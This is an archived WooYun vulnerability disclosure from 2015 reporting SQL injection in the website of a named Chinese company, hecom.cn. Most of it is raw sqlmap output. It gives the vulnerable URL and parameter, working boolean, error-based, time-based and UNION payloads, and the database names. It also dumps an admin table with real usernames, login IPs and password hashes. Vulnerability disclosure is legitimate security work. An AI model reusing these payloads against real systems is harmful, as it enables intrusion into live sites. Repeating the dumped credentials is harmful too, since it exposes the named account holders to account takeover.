乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-23: 细节已通知厂商并且等待厂商处理中 2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开
和创科技(原图搜天下)【官网】红圈营销-排名第一的企业级移动销售云服务平台
注入点:http://www.hecom.cn:80/phone/culdetail.php?id=199参数 id 可注入
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 211 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://www.hecom.cn:80/phone/culdetail.php?id=-5435 OR 9238=9238#21=6 AND 526=526 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://www.hecom.cn:80/phone/culdetail.php?id=-6779 OR 1 GROUP BY CONCAT(0x71706b7671,(SELECT (CASE WHEN (1297=1297) THEN 1 ELSE 0 END)),0x717a6b6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#21=6 AND 526=526 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (comment) Payload: http://www.hecom.cn:80/phone/culdetail.php?id=199 AND 3 AND SLEEP(5)#21=6 AND 526=526 Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: http://www.hecom.cn:80/phone/culdetail.php?id=-7488 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x615979776d5344594c75,0x717a6b6a71)-- 21=6 AND 526=526---[11:05:59] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0.12[11:05:59] [INFO] fetching database names[11:05:59] [INFO] the SQL query used returns 2 entries[11:05:59] [INFO] retrieved: information_schema[11:05:59] [INFO] retrieved: websitenewavailable databases [2]:[*] information_schema[*] websitenew[11:06:00] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.hecom.cn'[*] shutting down at 11:06:00
do you want to store hashes to a temporary file for eventual further processingwith other tools [y/N] ndo you want to crack them via a dictionary-based attack? [Y/n/q] nDatabase: websitenewTable: wurenet_admin[5 entries]+----+-----+-------+------------+---------------+---------------+------------+----------+----------------------------------+| id | vip | state | addtime | loginip | username | datetime | isdelete | password |+----+-----+-------+------------+---------------+---------------+------------+----------+----------------------------------+| 9 | 0 | 0 | 1393228841 | 127.0.0.2 | adminhc | 1405163326 | 0 | f65f6c0da1882bb500bcdd38b450036b || 14 | 0 | 0 | 1404559585 | 127.0.0.2 | huahao | 1404612664 | 0 | 1dd404921834e8226cd1d1051170586e || 28 | 3 | 0 | 1435052599 | 218.240.51.99 | yanwannan | 1435052599 | 0 | 1b8abe17b17c8fb021085040681466da || 29 | 3 | 0 | 1435052618 | 218.240.51.99 | zhangyajun | 1435052618 | 0 | ab765510737d2bbe55fa6b7681438196 || 30 | 3 | 0 | 1435280793 | 218.240.51.99 | renshizhaopin | 1435280793 | 0 | 6193645877a650211910855d9135fb62 |+----+-----+-------+------------+---------------+---------------+------------+----------+----------------------------------+[11:09:30] [INFO] table 'websitenew.wurenet_admin' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\www.hecom.cn\dump\websitenew\wurenet_admin.csv'[11:09:30] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.hecom.cn'[*] shutting down at 11:09:30
危害等级:无影响厂商忽略
忽略时间:2015-07-28 11:58
漏洞Rank:4 (WooYun评价)
暂无